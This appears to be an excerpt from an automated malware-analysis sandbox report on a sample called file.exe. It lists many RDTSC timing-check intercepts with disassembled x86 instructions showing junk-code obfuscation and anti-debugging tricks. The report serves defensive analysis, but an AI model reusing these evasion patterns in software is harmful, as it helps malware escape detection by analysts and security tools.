Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 101642E, second address: 1016469, instructions: 0x00000000 rdtsc; 0x00000002 jmp 00007F0C5CE44013h; 0x00000007 pop edx; 0x00000008 pop eax; 0x00000009 popad; 0x0000000a mov eax, dword ptr [eax]; 0x0000000c push eax; 0x0000000d jo 00007F0C5CE44008h; 0x00000013 pushad; 0x00000014 popad; 0x00000015 pop eax; 0x00000016 mov dword ptr [esp+04h], eax; 0x0000001a push eax; 0x0000001b push edx; 0x0000001c push eax; 0x0000001d push edx; 0x0000001e jmp 00007F0C5CE4400Fh; 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1016469, second address: 101647D, instructions: 0x00000000 rdtsc; 0x00000002 jmp 00007F0C5CC49420h; 0x00000007 pop edx; 0x00000008 pop eax; 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 101647D, second address: 1016487, instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 js 00007F0C5CE44006h; 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1016487, second address: 101648B, instructions: 0x00000000 rdtsc; 0x00000002 push eax; 0x00000003 push edx; 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10164C8, second address: 1016545, instructions: 0x00000000 rdtsc; 0x00000002 js 00007F0C5CE44008h; 0x00000008 pop edx; 0x00000009 pop eax; 0x0000000a nop; 0x0000000b mov edi, 5B2E4A05h; 0x00000010 push 00000000h; 0x00000012 push 00000000h; 0x00000014 push ebp; 0x00000015 call 00007F0C5CE44008h; 0x0000001a pop ebp; 0x0000001b mov dword ptr [esp+04h], ebp; 0x0000001f add dword ptr [esp+04h], 00000019h; 0x00000027 inc ebp; 0x00000028 push ebp; 0x00000029 ret; 0x0000002a pop ebp; 0x0000002b ret; 0x0000002c call 00007F0C5CE4400Bh; 0x00000031 push edx; 0x00000032 pop edx; 0x00000033 pop edi; 0x00000034 jmp 00007F0C5CE44017h; 0x00000039 call 00007F0C5CE44009h; 0x0000003e pushad; 0x0000003f push eax; 0x00000040 push edx; 0x00000041 jmp 00007F0C5CE44017h; 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1016545, second address: 101654E, instructions: 0x00000000 rdtsc; 0x00000002 push edi; 0x00000003 pop edi; 0x00000004 pop edx; 0x00000005 pop eax; 0x00000006 push edi; 0x00000007 push eax; 0x00000008 push edx; 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 101654E, second address: 1016559, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 pop edi; 0x00000005 popad; 0x00000006 push eax; 0x00000007 push ecx; 0x00000008 pushad; 0x00000009 push eax; 0x0000000a push edx; 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1016559, second address: 1016599, instructions: 0x00000000 rdtsc; 0x00000002 pop edx; 0x00000003 pop eax; 0x00000004 push eax; 0x00000005 pop eax; 0x00000006 popad; 0x00000007 pop ecx; 0x00000008 mov eax, dword ptr [esp+04h]; 0x0000000c jmp 00007F0C5CC49429h; 0x00000011 mov eax, dword ptr [eax]; 0x00000013 push eax; 0x00000014 push edx; 0x00000015 jmp 00007F0C5CC49427h; 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016599 second address: 101659E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101659E second address: 10165B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016690 second address: 101669A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101669A second address: 1016705 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F0C5CC49427h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push edx 0x0000001f jnc 00007F0C5CC4942Ch 0x00000025 pop edx 0x00000026 pop eax 0x00000027 movsx edx, dx 0x0000002a lea ebx, dword ptr [ebp+12458310h] 0x00000030 mov dword ptr [ebp+122D18B9h], ecx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jp 00007F0C5CC49416h 0x00000040 push eax 0x00000041 pop eax 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10167F2 second address: 10167F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10167F7 second address: 101686D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2A2C91D9h 0x00000010 sub dword ptr [ebp+122D3044h], edx 0x00000016 lea ebx, dword ptr [ebp+12458319h] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F0C5CBCB6C8h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 jmp 00007F0C5CBCB6D5h 0x0000003b sub dword ptr [ebp+122DB59Bh], edi 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 ja 00007F0C5CBCB6C6h 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101686D second address: 1016873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1016873 second address: 10168A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F0C5CBCB6CBh 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10168A0 second address: 10168A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101693C second address: 101699A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jne 00007F0C5CBCB6C6h 0x0000000e popad 0x0000000f popad 0x00000010 add dword ptr [esp], 5BB05AD9h 0x00000017 jnl 00007F0C5CBCB6CCh 0x0000001d push 00000003h 0x0000001f mov di, 59EFh 0x00000023 push 00000000h 0x00000025 call 00007F0C5CBCB6D5h 0x0000002a mov esi, dword ptr [ebp+122D1E1Bh] 0x00000030 pop esi 0x00000031 push 00000003h 0x00000033 mov dword ptr [ebp+122D28F4h], ecx 0x00000039 push 888EB9D7h 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007F0C5CBCB6C8h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101699A second address: 10169A4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0C5DC268ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAF65 second address: FFAF7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5CBCB6D5h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034D21 second address: 1034D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0C5DC268ABh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1034D35 second address: 1034D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103519D second address: 10351B2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0C5DC268A6h 0x00000008 jmp 00007F0C5DC268ABh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035309 second address: 103532A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jl 00007F0C5CBCB6D4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103557B second address: 1035583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035583 second address: 1035592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007F0C5CBCB6C8h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035592 second address: 1035597 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10356DA second address: 10356E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10356E4 second address: 10356E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035ADB second address: 1035AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10364F3 second address: 10364FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1036654 second address: 103666F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0C5CBCB6C6h 0x0000000a jmp 00007F0C5CBCB6D1h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038C42 second address: 1038C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0C5DC268B6h 0x0000000b popad 0x0000000c jmp 00007F0C5DC268AFh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038C6E second address: 1038C82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1038C82 second address: 1038CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0C5DC268A6h 0x0000000f jmp 00007F0C5DC268B1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EAC2 second address: 103EAC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104263E second address: 1042654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5DC268B2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041C70 second address: 1041C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1041C76 second address: 1041C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1042250 second address: 1042255 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10423D7 second address: 10423E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0C5DC268A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10423E1 second address: 10423FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0C5CBCB6D5h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104351E second address: 1043560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F0C5DC268A8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F0C5DC268B4h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jc 00007F0C5DC268B2h 0x0000001f jns 00007F0C5DC268ACh 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043560 second address: 1043595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F0C5CBCB6CEh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f pop eax 0x00000010 push 4BCF3701h 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007F0C5CBCB6D5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043A5D second address: 1043A66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1043A66 second address: 1043A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044227 second address: 104424C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0C5DC268ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007F0C5DC268B0h 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044447 second address: 104444C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10446AF second address: 10446B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044CDD second address: 1044D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0C5CBCB6CCh 0x0000000a jp 00007F0C5CBCB6C6h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F0C5CBCB6C8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D30F0h], ecx 0x00000034 call 00007F0C5CBCB6CFh 0x00000039 mov dword ptr [ebp+1247DD85h], ebx 0x0000003f pop edi 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 pushad 0x00000044 or ecx, 41169623h 0x0000004a xor dword ptr [ebp+122D1B92h], edi 0x00000050 popad 0x00000051 pop esi 0x00000052 push 00000000h 0x00000054 push 00000000h 0x00000056 push ebx 0x00000057 call 00007F0C5CBCB6C8h 0x0000005c pop ebx 0x0000005d mov dword ptr [esp+04h], ebx 0x00000061 add dword ptr [esp+04h], 00000016h 0x00000069 inc ebx 0x0000006a push ebx 0x0000006b ret 0x0000006c pop ebx 0x0000006d ret 0x0000006e jmp 00007F0C5CBCB6D1h 0x00000073 xchg eax, ebx 0x00000074 push eax 0x00000075 push edx 0x00000076 push ecx 0x00000077 pushad 0x00000078 popad 0x00000079 pop ecx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045610 second address: 1045615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047DB3 second address: 1047DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1047DB7 second address: 1047E03 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jno 00007F0C5DC268A8h 0x0000000e pushad 0x0000000f jng 00007F0C5DC268A6h 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a push 00000000h 0x0000001c add esi, dword ptr [ebp+122D345Ch] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F0C5DC268A8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000014h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e push eax 0x0000003f jc 00007F0C5DC268B0h 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049403 second address: 1049496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F0C5CBCB6C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov esi, ebx 0x00000029 push 00000000h 0x0000002b jnl 00007F0C5CBCB6CCh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F0C5CBCB6C8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov esi, 212BCB3Bh 0x00000052 xchg eax, ebx 0x00000053 jmp 00007F0C5CBCB6D6h 0x00000058 push eax 0x00000059 pushad 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049496 second address: 10494B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0C5DC268B4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10494B3 second address: 10494B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1049DB9 second address: 1049DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FE1A second address: 104FE74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d add ebx, dword ptr [ebp+122D32EDh] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D177Dh], ecx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F0C5CBCB6C8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a jc 00007F0C5CBCB6C8h 0x00000040 push esi 0x00000041 pop esi 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050F2B second address: 1050F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0C5DC268ACh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050F40 second address: 1050F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CBCB6CDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050F51 second address: 1050FB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DC268B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0C5DC268A8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F0C5DC268A8h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 push 00000000h 0x00000044 add dword ptr [ebp+122D1B68h], ecx 0x0000004a push eax 0x0000004b pushad 0x0000004c push edi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052170 second address: 10521F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5CBCB6CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F0C5CBCB6D3h 0x00000010 pop edi 0x00000011 nop 0x00000012 mov edi, 458E009Dh 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F0C5CBCB6C8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 jnc 00007F0C5CBCB6DDh 0x00000039 mov ebx, dword ptr [ebp+1247C4D3h] 0x0000003f push 00000000h 0x00000041 jmp 00007F0C5CBCB6D1h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push edi 0x0000004b pop edi 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10521F8 second address: 1052212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0C5DC268ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007F0C5DC268A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1052212 second address: 1052222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jo 00007F0C5CBCB6CEh 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10568A2 second address: 10568E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 pushad 0x00000009 xor dword ptr [ebp+122D2DBEh], eax 0x0000000f mov si, C980h 0x00000013 popad 0x00000014 push 00000000h 0x00000016 mov edi, eax 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F0C5DC268A8h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 xor dword ptr [ebp+122D19BAh], edx 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10568E8 second address: 10568F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10568F3 second address: 10568F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058797 second address: 10587AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0C5CBCB6D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1058840 second address: 1058845 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
